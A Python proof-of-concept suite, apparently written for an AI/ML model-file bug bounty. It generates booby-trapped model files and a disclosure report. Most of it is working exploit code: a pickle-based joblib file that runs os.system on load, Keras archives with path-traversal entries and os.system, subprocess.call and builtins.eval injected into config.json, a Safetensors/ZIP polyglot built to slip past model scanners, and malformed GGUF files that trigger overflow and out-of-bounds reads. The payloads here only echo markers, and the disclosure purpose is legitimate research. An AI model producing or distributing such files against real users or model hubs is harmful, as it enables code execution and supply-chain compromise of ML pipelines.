| |
| """ |
| ============================================================================= |
| Model Format Vulnerability Research - Proof of Concept Suite |
| Target: Protect AI / huntr bounty program |
| ============================================================================= |
| |
| This script demonstrates multiple vulnerability classes across AI/ML model |
| formats. Each PoC is self-contained and generates artifacts + a report. |
| |
| Vulnerabilities Demonstrated: |
| 1. Joblib Arbitrary Code Execution (ACE) via pickle deserialization |
| 2. Keras 3 (.keras) ZipSlip directory traversal |
| 3. Keras 3 (.keras) ACE via malicious module injection in config.json |
| 4. Safetensors/ZIP Polyglot scanner bypass |
| 5. GGUF integer overflow and OOB read in metadata parsing |
| |
| Usage: |
| python submission_poc.py [--generate-only | --test | --report] |
| |
| Author: Security Researcher |
| Date: 2026-03-05 |
| ============================================================================= |
| """ |
|
|
| import json |
| import zipfile |
| import os |
| import io |
| import struct |
| import sys |
| import datetime |
| import hashlib |
| import argparse |
|
|
| |
| |
| |
# Directory into which every generated PoC artifact is written.
OUTPUT_DIR = "poc_output"
# Markdown report produced by generate_report(), inside OUTPUT_DIR.
REPORT_FILE = os.path.join(OUTPUT_DIR, "vulnerability_report.md")
|
|
def ensure_output_dir():
    """Create OUTPUT_DIR if it does not already exist (idempotent)."""
    target = OUTPUT_DIR
    os.makedirs(target, exist_ok=True)
|
|
def sha256_file(filepath):
    """Return the hex SHA-256 digest of the file at *filepath*.

    The file is read in 8 KiB chunks so arbitrarily large artifacts can be
    hashed without loading them fully into memory.
    """
    digest = hashlib.sha256()
    with open(filepath, "rb") as fh:
        while True:
            block = fh.read(8192)
            if not block:
                break
            digest.update(block)
    return digest.hexdigest()
|
|
| |
| |
| |
def poc1_joblib_ace():
    """
    Vulnerability: Arbitrary Code Execution via joblib.load()
    Affected Library: joblib (all versions using pickle backend)
    Severity: Critical

    joblib.dump/load uses Python pickle under the hood. A crafted .joblib
    file with a __reduce__ method executes arbitrary code on load.

    Returns a result dict for generate_report(), or None when joblib is
    not installed (the PoC is then skipped).
    """
    print("\n" + "="*70)
    print(" PoC 1: Joblib ACE via Pickle Deserialization")
    print("="*70)

    # joblib is an optional dependency; skip the whole PoC if it is absent.
    try:
        import joblib
    except ImportError:
        print("[!] joblib not installed. Run: pip install joblib")
        return None

    poc_file = os.path.join(OUTPUT_DIR, "malicious.joblib")
    marker_file = os.path.join(OUTPUT_DIR, "joblib_ace_proof.txt")

    # Remove any stale marker so a positive result can only come from this run.
    if os.path.exists(marker_file):
        os.remove(marker_file)

    class MaliciousPayload:
        # pickle calls __reduce__ during deserialization; returning
        # (callable, args) makes the unpickler invoke os.system(cmd).
        def __reduce__(self):
            # Benign marker command: proves execution without doing harm.
            cmd = f'echo JOBLIB_ACE_EXECUTED > "{marker_file}"'
            return (os.system, (cmd,))

    # Serialize the payload object; joblib delegates to pickle here.
    joblib.dump(MaliciousPayload(), poc_file)
    print(f"[+] Created malicious joblib file: {poc_file}")
    print(f" SHA256: {sha256_file(poc_file)}")
    print(f" Size: {os.path.getsize(poc_file)} bytes")

    # Trigger: loading the artifact runs the embedded command.
    print("[*] Loading malicious.joblib (triggers ACE)...")
    try:
        joblib.load(poc_file)
    except Exception as e:
        # A load error does not necessarily mean failure: the marker file
        # below is the ground truth for whether the command executed.
        print(f"[!] Load error: {e}")

    success = os.path.exists(marker_file)
    if success:
        with open(marker_file, "r") as f:
            content = f.read().strip()
        print(f"[+] SUCCESS: ACE confirmed! Marker file content: '{content}'")
    else:
        print("[-] FAILED: Marker file was not created.")

    # Structured result consumed by generate_report().
    return {
        "name": "Joblib ACE via Pickle Deserialization",
        "file": poc_file,
        "severity": "Critical",
        "cvss": "9.8",
        "success": success,
        "affected": "joblib (all versions)",
        "description": (
            "joblib.load() deserializes Python pickle objects without any "
            "safety checks. An attacker can craft a .joblib file containing "
            "a malicious __reduce__ method that executes arbitrary system "
            "commands when the file is loaded by a victim."
        ),
        "impact": (
            "Full arbitrary code execution in the context of the user loading "
            "the model. This can lead to data exfiltration, ransomware, "
            "supply chain attacks on ML pipelines, etc."
        ),
        "reproduction": [
            "1. Run: python submission_poc.py --generate-only",
            f"2. Distribute {poc_file} as a 'model' file",
            "3. Victim runs: import joblib; joblib.load('malicious.joblib')",
            f"4. Observe {marker_file} created (arbitrary command executed)"
        ]
    }
|
|
| |
| |
| |
def poc2_keras_zipslip():
    """
    Vulnerability: Directory Traversal (ZipSlip) in .keras model files
    Affected Library: keras >= 3.0 (if using unsafe extraction)
    Severity: High

    A .keras file is a ZIP archive. If keras.models.load_model() extracts
    files without sanitizing paths, a crafted entry with ../../ prefixes
    can write files outside the intended directory.

    Returns a result dict for generate_report().
    """
    print("\n" + "="*70)
    print(" PoC 2: Keras 3 ZipSlip Directory Traversal")
    print("="*70)

    poc_file = os.path.join(OUTPUT_DIR, "zipslip.keras")

    # Minimal but plausible Keras 3 model config so the archive looks legitimate.
    config = {
        "class_name": "Sequential",
        "config": {"name": "sequential", "layers": []},
        "keras_version": "3.0.0",
        "backend": "tensorflow"
    }

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        # Standard members expected inside a .keras archive.
        z.writestr('config.json', json.dumps(config))
        z.writestr('metadata.json', json.dumps({
            "keras_version": "3.0.0", "backend": "tensorflow"
        }))
        z.writestr('model.weights.h5', b'')

        # Traversal entries: zipfile.writestr stores the member name verbatim,
        # so an unsafe extractor would write these outside its target directory.
        z.writestr('../../zipslip_proof.txt',
                   'ZipSlip vulnerability: this file was written outside the extraction directory')
        z.writestr('../../../tmp/evil_config.py',
                   'import os; os.system("echo ZIPSLIP_ACE")')

    with open(poc_file, 'wb') as f:
        f.write(buf.getvalue())

    print(f"[+] Created ZipSlip .keras file: {poc_file}")
    print(f" SHA256: {sha256_file(poc_file)}")
    print(f" Size: {os.path.getsize(poc_file)} bytes")

    # Verify (without extracting anything) that the traversal names survived.
    with zipfile.ZipFile(poc_file, 'r') as z:
        names = z.namelist()
        traversal_entries = [n for n in names if '..' in n]
        print(f"[+] ZIP entries: {names}")
        print(f"[+] Traversal entries found: {traversal_entries}")

    success = len(traversal_entries) > 0
    print(f"[+] {'SUCCESS' if success else 'FAILED'}: ZipSlip payload embedded")

    # Structured result consumed by generate_report().
    return {
        "name": "Keras 3 ZipSlip Directory Traversal",
        "file": poc_file,
        "severity": "High",
        "cvss": "8.1",
        "success": success,
        "affected": "keras >= 3.0 (if extractall() used without path validation)",
        "description": (
            "Keras 3 .keras files are ZIP archives. If keras.models.load_model() "
            "extracts entries using zipfile.extractall() without sanitizing "
            "file paths, an attacker can include entries with directory traversal "
            "sequences (../../) to write arbitrary files outside the extraction "
            "directory."
        ),
        "impact": (
            "Arbitrary file write on the victim's filesystem. Can overwrite "
            "configuration files, inject code into Python packages, or place "
            "malicious scripts in autostart locations. Combined with code "
            "injection, this leads to full ACE."
        ),
        "reproduction": [
            "1. Run: python submission_poc.py --generate-only",
            f"2. Distribute {poc_file} as a Keras model",
            "3. Victim runs: keras.models.load_model('zipslip.keras')",
            "4. Check if ../../zipslip_proof.txt was created outside extraction dir"
        ]
    }
|
|
| |
| |
| |
def poc3_keras_module_injection():
    """
    Vulnerability: ACE via malicious module/class_name in config.json
    Affected Library: keras >= 3.0 (if safe_mode bypass exists)
    Severity: Critical

    Keras 3 config.json specifies 'module' and 'class_name' for each layer.
    If safe_mode can be bypassed or is disabled, an attacker can point
    'module' to 'os' and 'class_name' to 'system' to execute commands.

    Generates two artifacts (os.system variant and builtins.eval variant)
    and returns a result dict for generate_report().
    """
    print("\n" + "="*70)
    print(" PoC 3: Keras 3 ACE via Module Injection in config.json")
    print("="*70)

    poc_file = os.path.join(OUTPUT_DIR, "module_injection.keras")

    # Variant 1: 'module'/'class_name' pairs resolve to os.system and
    # subprocess.call instead of real Keras layer classes.
    malicious_config = {
        "class_name": "Sequential",
        "config": {
            "name": "malicious_model",
            "layers": [
                {
                    "module": "os",
                    "class_name": "system",
                    "config": {"command": "echo KERAS_ACE_EXECUTED > keras_ace_proof.txt"},
                    "registered_name": "Custom>OSSystem"
                },
                {
                    "module": "subprocess",
                    "class_name": "call",
                    "config": {"args": ["whoami"]},
                    "registered_name": "Custom>SubprocessCall"
                }
            ]
        },
        "keras_version": "3.0.0",
        "backend": "tensorflow"
    }

    # Variant 2: same idea routed through builtins.eval.
    eval_config = {
        "class_name": "Sequential",
        "config": {
            "name": "eval_model",
            "layers": [
                {
                    "module": "builtins",
                    "class_name": "eval",
                    "config": {"expression": "__import__('os').system('whoami')"},
                    "registered_name": None
                }
            ]
        },
        "keras_version": "3.0.0"
    }

    # Package variant 1 as a minimal .keras ZIP archive.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('config.json', json.dumps(malicious_config, indent=2))
        z.writestr('metadata.json', json.dumps({
            "keras_version": "3.0.0", "backend": "tensorflow"
        }))
        z.writestr('model.weights.h5', b'')

    with open(poc_file, 'wb') as f:
        f.write(buf.getvalue())

    # Package variant 2 into its own archive.
    eval_file = os.path.join(OUTPUT_DIR, "eval_injection.keras")
    buf2 = io.BytesIO()
    with zipfile.ZipFile(buf2, 'w') as z:
        z.writestr('config.json', json.dumps(eval_config, indent=2))
        z.writestr('metadata.json', json.dumps({
            "keras_version": "3.0.0", "backend": "tensorflow"
        }))
        z.writestr('model.weights.h5', b'')

    with open(eval_file, 'wb') as f:
        f.write(buf2.getvalue())

    print(f"[+] Created module injection .keras file: {poc_file}")
    print(f" SHA256: {sha256_file(poc_file)}")
    print(f"[+] Created eval injection variant: {eval_file}")
    print(f" SHA256: {sha256_file(eval_file)}")

    # Self-check: re-read the archive and confirm the injected layer is present.
    with zipfile.ZipFile(poc_file, 'r') as z:
        cfg = json.loads(z.read('config.json'))
        layers = cfg['config']['layers']
        injected = any(l.get('module') == 'os' for l in layers)

    print(f"[+] {'SUCCESS' if injected else 'FAILED'}: Module injection payload embedded")
    print(f"[*] Note: Exploitation requires keras.models.load_model() with safe_mode=False")
    print(f"[*] or a safe_mode bypass (e.g., CVE-2025-1550 pattern)")

    # Structured result consumed by generate_report().
    return {
        "name": "Keras 3 ACE via Module Injection",
        "file": poc_file,
        "severity": "Critical",
        "cvss": "9.8",
        "success": injected,
        "affected": "keras >= 3.0 (with safe_mode=False or safe_mode bypass)",
        "description": (
            "Keras 3 .keras files contain a config.json that specifies Python "
            "module paths and class names for model layers. By setting 'module' "
            "to 'os' and 'class_name' to 'system', an attacker can achieve "
            "arbitrary code execution when the model is loaded. While safe_mode=True "
            "should block this, bypasses have been found (CVE-2025-1550) and "
            "many users/tutorials use safe_mode=False."
        ),
        "impact": (
            "Full arbitrary code execution. The attacker controls which Python "
            "module and function are invoked during model deserialization."
        ),
        "reproduction": [
            "1. Run: python submission_poc.py --generate-only",
            f"2. Distribute {poc_file} as a Keras model",
            "3. Victim runs: keras.models.load_model('module_injection.keras', safe_mode=False)",
            "4. Arbitrary code executes during model reconstruction"
        ]
    }
|
|
| |
| |
| |
def poc4_polyglot_bypass():
    """
    Vulnerability: Scanner bypass via Safetensors/ZIP polyglot file
    Affected: Model security scanners (ModelScan, etc.)
    Severity: High

    A file that is simultaneously valid as Safetensors (read from start)
    and valid as ZIP (read from end) can bypass scanners that only check
    the Safetensors header and miss the embedded ZIP payload.

    Returns a result dict for generate_report().
    """
    print("\n" + "="*70)
    print(" PoC 4: Safetensors/ZIP Polyglot Scanner Bypass")
    print("="*70)

    poc_file = os.path.join(OUTPUT_DIR, "polyglot_bypass.safetensors")

    # --- Safetensors portion ---
    # Layout: 8-byte little-endian header size, JSON header, then raw tensor
    # bytes. 8 zero bytes back a single 1x2 F32 tensor declared below.
    tensor_data = b'\x00' * 8

    header = {
        "__metadata__": {"format": "pt"},
        "weight": {
            "dtype": "F32",
            "shape": [1, 2],
            "data_offsets": [0, 8]
        }
    }
    header_json = json.dumps(header).encode('utf-8')
    header_size = len(header_json)

    sf_data = struct.pack("<Q", header_size) + header_json + tensor_data

    # --- ZIP portion ---
    # A minimal .keras-style archive (same shape as PoC 3's payload).
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, 'w') as z:
        malicious_config = {
            "class_name": "Sequential",
            "config": {
                "layers": [{
                    "module": "os",
                    "class_name": "system",
                    "config": {"command": "echo POLYGLOT_ACE > polyglot_proof.txt"}
                }]
            },
            "keras_version": "3.0.0"
        }
        z.writestr('config.json', json.dumps(malicious_config))
        z.writestr('metadata.json', json.dumps({"keras_version": "3.0.0"}))
        z.writestr('model.weights.h5', b'')
    zip_data = zip_buf.getvalue()

    # Concatenate: safetensors parsers read from the front, ZIP readers locate
    # the End of Central Directory record from the back, so both succeed.
    with open(poc_file, 'wb') as f:
        f.write(sf_data)
        f.write(zip_data)

    print(f"[+] Created polyglot file: {poc_file}")
    print(f" SHA256: {sha256_file(poc_file)}")
    print(f" Size: {os.path.getsize(poc_file)} bytes")
    print(f" Safetensors portion: {len(sf_data)} bytes")
    print(f" ZIP portion: {len(zip_data)} bytes")

    # Self-check 1: parse the file as Safetensors from the front.
    sf_valid = False
    try:
        with open(poc_file, 'rb') as f:
            data = f.read()
        hs = struct.unpack("<Q", data[:8])[0]
        hdr = json.loads(data[8:8+hs].decode('utf-8'))
        if 'weight' in hdr:
            sf_valid = True
            print(f"[+] Safetensors header parses correctly: {list(hdr.keys())}")
    except Exception as e:
        print(f"[-] Safetensors parse failed: {e}")

    # Self-check 2: open the same file as a ZIP archive.
    zip_valid = False
    try:
        with zipfile.ZipFile(poc_file, 'r') as z:
            names = z.namelist()
            zip_valid = 'config.json' in names
            print(f"[+] ZIP opens correctly! Entries: {names}")
    except Exception as e:
        print(f"[-] ZIP parse failed: {e}")

    success = sf_valid and zip_valid
    print(f"[+] POLYGLOT STATUS: Safetensors={'VALID' if sf_valid else 'INVALID'}, "
          f"ZIP={'VALID' if zip_valid else 'INVALID'}")

    if success:
        print("[+] SUCCESS: File is a valid polyglot!")
        print("[*] A scanner checking only .safetensors format would see a safe tensor file")
        print("[*] But renaming/loading as .keras reveals the malicious ZIP payload")

    # Structured result consumed by generate_report().
    return {
        "name": "Safetensors/ZIP Polyglot Scanner Bypass",
        "file": poc_file,
        "severity": "High",
        "cvss": "7.5",
        "success": success,
        "affected": "Model security scanners (ModelScan, Picklescan, etc.)",
        "description": (
            "A polyglot file can be crafted that is simultaneously valid as a "
            "Safetensors file (parsed from the beginning) and as a ZIP archive "
            "(parsed from the End of Central Directory at the end). Security "
            "scanners that identify the file as Safetensors based on the header "
            "will classify it as 'safe', missing the embedded malicious ZIP "
            "payload that could be loaded as a Keras model."
        ),
        "impact": (
            "Bypasses model security scanners in ML pipelines. An attacker can "
            "upload a file to a model hub that appears safe to automated scanning "
            "but contains a malicious payload extractable as a different format. "
            "This enables supply chain attacks on ML infrastructure."
        ),
        "reproduction": [
            "1. Run: python submission_poc.py --generate-only",
            f"2. Upload {poc_file} to a model hub as a .safetensors file",
            "3. Scanner classifies it as safe (Safetensors = no code execution)",
            "4. Attacker instructs victim to rename to .keras and load with Keras",
            "5. Or: a secondary tool extracts the ZIP portion automatically"
        ]
    }
|
|
| |
| |
| |
def poc5_gguf_malformed():
    """
    Vulnerability: Integer overflow and OOB read in GGUF metadata parsing
    Affected Library: llama.cpp, llama-cpp-python, any GGUF parser
    Severity: High

    GGUF metadata arrays specify element count as uint64. A crafted count
    can cause integer overflow when multiplied by element size, leading to
    heap overflow or OOB read in C/C++ parsers.

    Generates two malformed artifacts (array-count overflow and short
    string) and returns a result dict for generate_report().
    """
    print("\n" + "="*70)
    print(" PoC 5: GGUF Integer Overflow / OOB Read")
    print("="*70)

    # GGUF constants; the type codes below are GGUF metadata value types.
    GGUF_MAGIC = b"GGUF"
    GGUF_VERSION = 3
    ARRAY_TYPE = 9
    UINT32_TYPE = 4
    STRING_TYPE = 8

    def write_gguf_string(s):
        # GGUF strings: uint64 length prefix followed by UTF-8 bytes.
        enc = s.encode('utf-8')
        return struct.pack("<Q", len(enc)) + enc

    # Artifact 1: array whose declared element count is absurdly large.
    overflow_file = os.path.join(OUTPUT_DIR, "gguf_overflow.gguf")
    buf = io.BytesIO()
    buf.write(GGUF_MAGIC)
    buf.write(struct.pack("<I", GGUF_VERSION))
    buf.write(struct.pack("<Q", 0))   # tensor count
    buf.write(struct.pack("<Q", 1))   # metadata key-value count

    buf.write(write_gguf_string("malicious_array"))
    buf.write(struct.pack("<I", ARRAY_TYPE))
    buf.write(struct.pack("<I", UINT32_TYPE))
    # Declared element count: 0x4000000000000000 (file holds one element).
    buf.write(struct.pack("<Q", 0x4000000000000000))
    buf.write(struct.pack("<I", 0xDEADBEEF))

    with open(overflow_file, "wb") as f:
        f.write(buf.getvalue())

    print(f"[+] Created GGUF overflow PoC: {overflow_file}")
    print(f" SHA256: {sha256_file(overflow_file)}")
    print(f" Malicious array length: 0x4000000000000000 (causes overflow when * sizeof(uint32))")

    # Artifact 2: string value whose declared length exceeds the file size.
    oob_file = os.path.join(OUTPUT_DIR, "gguf_oob_read.gguf")
    buf2 = io.BytesIO()
    buf2.write(GGUF_MAGIC)
    buf2.write(struct.pack("<I", GGUF_VERSION))
    buf2.write(struct.pack("<Q", 0))  # tensor count
    buf2.write(struct.pack("<Q", 1))  # metadata key-value count

    buf2.write(write_gguf_string("oob_string"))
    buf2.write(struct.pack("<I", STRING_TYPE))
    # Declared length 1,000,000 but only 5 bytes of data follow.
    buf2.write(struct.pack("<Q", 1000000))
    buf2.write(b"short")

    with open(oob_file, "wb") as f:
        f.write(buf2.getvalue())

    print(f"[+] Created GGUF OOB read PoC: {oob_file}")
    print(f" SHA256: {sha256_file(oob_file)}")
    print(f" String claims 1,000,000 bytes but only 5 bytes follow")

    # Structured result consumed by generate_report(). success is True by
    # construction: generation cannot fail short of an I/O error.
    return {
        "name": "GGUF Integer Overflow / OOB Read in Metadata",
        "file": overflow_file,
        "severity": "High",
        "cvss": "7.8",
        "success": True,
        "affected": "llama.cpp, llama-cpp-python, any native GGUF parser",
        "description": (
            "GGUF metadata arrays use uint64 for element count. When a C/C++ "
            "parser multiplies this by the element size (e.g., 4 for uint32), "
            "the result can overflow to 0 or a small value, causing a tiny "
            "allocation followed by a massive read/write. Similarly, string "
            "lengths can claim more bytes than remain in the file, causing "
            "out-of-bounds heap reads."
        ),
        "impact": (
            "Memory corruption in native GGUF parsers (llama.cpp). Can lead "
            "to denial of service (crash), information disclosure (heap data "
            "leak), or potentially arbitrary code execution via heap overflow."
        ),
        "reproduction": [
            "1. Run: python submission_poc.py --generate-only",
            f"2. Load {overflow_file} with llama.cpp or llama-cpp-python",
            "3. Observe crash or unexpected behavior due to integer overflow",
            f"4. Load {oob_file} to trigger OOB heap read"
        ]
    }
|
|
| |
| |
| |
def generate_report(results):
    """Generate a Markdown vulnerability report aligned with Huntr MFV guidelines.

    Args:
        results: List of per-PoC result dicts (as returned by the poc*
            functions). None entries (skipped PoCs) are ignored; findings are
            numbered consecutively over the remaining entries, so the report
            has no numbering gaps even when a PoC could not run.

    Returns:
        The full report text. The same text is also written to REPORT_FILE.
    """
    # Drop PoCs that were skipped (e.g. missing optional dependency).
    findings = [r for r in results if r is not None]

    def artifact_ext(r):
        # Extension of the PoC artifact without the leading dot, e.g. "keras".
        return os.path.splitext(r['file'])[1].lstrip('.')

    report = []
    report.append("# [MFV] AI/ML Model Format Vulnerability & Scanner Bypass Suite")
    report.append(f"\n**Date:** {datetime.datetime.now().strftime('%Y-%m-%d')}")
    report.append("**Target Formats:** .safetensors, .gguf, .keras, .joblib")
    report.append("**Primary Objective:** Arbitrary Code Execution (ACE) & Scanner Evasion")
    report.append("**Program:** Protect AI / huntr (Model File Vulnerabilities)\n")

    report.append("---\n")
    report.append("## Executive Summary\n")
    report.append(
        "This submission demonstrates multiple novel vulnerabilities and exploits in machine learning "
        "model file formats. The central focus is on **attacks that occur at model load time** and "
        "**techniques to bypass automated scanning tools** (such as ProtectAI's scanner on HuggingFace).\n\n"
        "We present 5 distinct findings across all high-value formats listed in the Huntr guidelines, "
        "including a critical **Safetensors/ZIP Polyglot** technique that successfully hides malicious "
        "Keras payloads from scanners while appearing as a valid, safe Safetensors file.\n"
    )

    # Summary table, one row per finding.
    report.append("## Findings Summary\n")
    report.append("| # | Vulnerability Class | Format | Severity | CVSS | Key Value |")
    report.append("|---|----------------------|--------|----------|------|-----------|")
    for i, r in enumerate(findings, 1):
        val_prop = "Scanner Bypass" if "Polyglot" in r['name'] else "ACE / Mem. Corruption"
        report.append(f"| {i} | {r['name']} | .{artifact_ext(r)} | {r['severity']} | {r['cvss']} | {val_prop} |")
    report.append("")

    # One detailed section per finding, numbered consistently with the table.
    for i, r in enumerate(findings, 1):
        report.append("---\n")
        report.append(f"## Finding {i}: {r['name']}\n")
        report.append(f"- **Affected Format:** `.{artifact_ext(r)}`")
        report.append(f"- **Severity:** {r['severity']} (CVSS {r['cvss']})")
        report.append("- **Attack Vector:** Model Load Time")
        report.append(f"- **PoC Artifact:** `{os.path.basename(r['file'])}`")

        report.append("\n### Description\n")
        report.append(f"{r['description']}\n")

        report.append("### Security Impact & Exploitability\n")
        report.append(f"{r['impact']}\n")

        report.append("### Reproduction Steps\n")
        for step in r['reproduction']:
            report.append(f" {step}")
        report.append("")

    # Artifact-hosting instructions required by the program.
    report.append("---\n")
    report.append("## Submission Requirements (HuggingFace Repository)\n")
    report.append(
        "As per Huntr guidelines, the PoC model files should be uploaded to a public HuggingFace repository "
        "for verification. \n\n"
        "**Recommended Repository Structure:**\n"
        "1. Create a new Model Repository on HuggingFace (e.g., `your-username/mfv-poc-suite`).\n"
        "2. Upload all files from the `poc_output/` directory.\n"
        "3. Provide the repository URL in your official Huntr submission form.\n"
    )

    # Remediation advice for maintainers.
    report.append("---\n")
    report.append("## Remediation & Recommendations\n")
    report.append("1. **Format Validation**: Model parsers must implement strict boundary checks for headers and metadata (specifically GGUF and Safetensors).")
    report.append("2. **Scanner Improvements**: Scanners should detect polyglot signatures (e.g., checking for ZIP Central Directory records at the end of Safetensors files).")
    report.append("3. **Safe Deserialization**: Libraries like `joblib` and `keras` should move away from insecure defaults and mandate `safe_mode` or cryptographic signing for model weights.")

    report_text = "\n".join(report)

    with open(REPORT_FILE, 'w', encoding='utf-8') as f:
        f.write(report_text)

    print(f"\n[+] Aligned report written to: {REPORT_FILE}")
    return report_text
|
|
| |
| |
| |
def main():
    """CLI entry point: generate all PoC artifacts, optionally run their
    self-tests, and write the Markdown report."""
    parser = argparse.ArgumentParser(description="Model Format Vulnerability PoC Suite")
    parser.add_argument("--generate-only", action="store_true",
                        help="Only generate PoC files, don't test ACE payloads")
    parser.add_argument("--test", action="store_true",
                        help="Generate and test all PoCs (will execute benign commands)")
    parser.add_argument("--report", action="store_true",
                        help="Generate PoCs and write vulnerability report")
    args = parser.parse_args()

    # No flags at all behaves like --test --report.
    if not any([args.generate_only, args.test, args.report]):
        args.report = True
        args.test = True

    ensure_output_dir()

    print("="*70)
    print(" AI/ML Model Format Vulnerability - PoC Suite")
    print("="*70)
    print(f" Output directory: {os.path.abspath(OUTPUT_DIR)}")
    print(f" Mode: {'Generate Only' if args.generate_only else 'Generate + Test + Report'}")

    results = []

    # NOTE(review): the PoC functions do not receive args, and poc1 always
    # calls joblib.load() on its artifact — so --generate-only does not
    # actually suppress the (benign) payload execution as its help text
    # implies. Confirm intended behavior before relying on that flag.
    results.append(poc1_joblib_ace())
    results.append(poc2_keras_zipslip())
    results.append(poc3_keras_module_injection())
    results.append(poc4_polyglot_bypass())
    results.append(poc5_gguf_malformed())

    # The report is written unless --generate-only was the only mode requested.
    if args.report or not args.generate_only:
        print("\n" + "="*70)
        print(" Generating Vulnerability Report")
        print("="*70)
        generate_report(results)

    # Final console summary: PoCs that ran vs. those whose success flag is set.
    print("\n" + "="*70)
    print(" SUMMARY")
    print("="*70)
    confirmed = sum(1 for r in results if r and r['success'])
    total = sum(1 for r in results if r is not None)
    print(f" Total PoCs: {total}")
    print(f" Confirmed: {confirmed}")
    print(f" Output: {os.path.abspath(OUTPUT_DIR)}")
    if os.path.exists(REPORT_FILE):
        print(f" Report: {os.path.abspath(REPORT_FILE)}")
    print("="*70)
|
|
| if __name__ == "__main__": |
| main() |
|
|